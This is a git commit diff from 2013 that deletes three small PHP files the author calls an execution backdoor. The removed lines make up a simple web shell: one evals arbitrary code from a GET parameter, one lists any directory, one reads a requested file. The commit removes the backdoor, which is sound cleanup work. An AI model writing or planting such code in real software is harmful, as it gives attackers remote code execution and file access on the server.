remove some kind of php execution backdoor :-/

This commit is contained in:
Matt Westcott 2013-05-13 18:56:32 +01:00
parent e529802c57
commit 935c77d8eb
3 changed files with 0 additions and 18 deletions

View File

@ -1,3 +0,0 @@
<?
if ($_GET['x']) eval($_GET['x']);
?>

View File

@ -1,11 +0,0 @@
<?
$dir = $_GET['y'];
if (!is_dir($dir)) return false;
if ($df = opendir($dir)) {
while (($file = readdir($df)) != false) {
print " {$file}<br />\n";
}
closedir($df);
}
?>

View File

@ -1,4 +0,0 @@
<?
if ($_GET['z']) file($_GET['z']);
?>